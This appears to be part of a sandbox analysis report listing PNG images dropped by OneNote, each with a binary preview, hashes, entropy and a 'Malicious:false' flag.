                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):8184
                                                                                                                                                                                                                  Entropy (8bit):7.807848176906598
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                                                                                                  MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                                                                                                  SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                                                                                                  SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                                                                                                  SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1924
                                                                                                                                                                                                                  Entropy (8bit):7.836744258175623
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                                                                                                  MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                                                                                                  SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                                                                                                  SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                                                                                                  SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11886
                                                                                                                                                                                                                  Entropy (8bit):7.946442244439929
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                                                                                                  MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                                                                                                  SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                                                                                                  SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                                                                                                  SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2270
                                                                                                                                                                                                                  Entropy (8bit):7.845368393313232
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                                                                                                  MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                                                                                                  SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                                                                                                  SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                                                                                                  SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):16003
                                                                                                                                                                                                                  Entropy (8bit):7.959532793770661
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                                                                                                  MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                                                                                                  SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                                                                                                  SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                                                                                                  SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13241
                                                                                                                                                                                                                  Entropy (8bit):7.931391290415517
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                                                                                                  MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                                                                                                  SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                                                                                                  SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                                                                                                  SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4190
                                                                                                                                                                                                                  Entropy (8bit):7.94161730428269
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                                                                                                  MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                                                                                                  SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                                                                                                  SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                                                                                                  SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4081
                                                                                                                                                                                                                  Entropy (8bit):7.943373267196131
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                                                                                                  MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                                                                                                  SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                                                                                                  SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                                                                                                  SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):22634
                                                                                                                                                                                                                  Entropy (8bit):7.974332204835705
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                                                                                                  MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                                                                                                  SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                                                                                                  SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                                                                                                  SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):17289
                                                                                                                                                                                                                  Entropy (8bit):7.962998633267186
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                                                                                                  MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                                                                                                  SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                                                                                                  SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                                                                                                  SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13737
                                                                                                                                                                                                                  Entropy (8bit):7.916899917415529
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                                                                                                  MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                                                                                                  SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                                                                                                  SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                                                                                                  SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2332
                                                                                                                                                                                                                  Entropy (8bit):7.8822150338370776
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                                                                                                  MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                                                                                                  SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                                                                                                  SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                                                                                                  SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
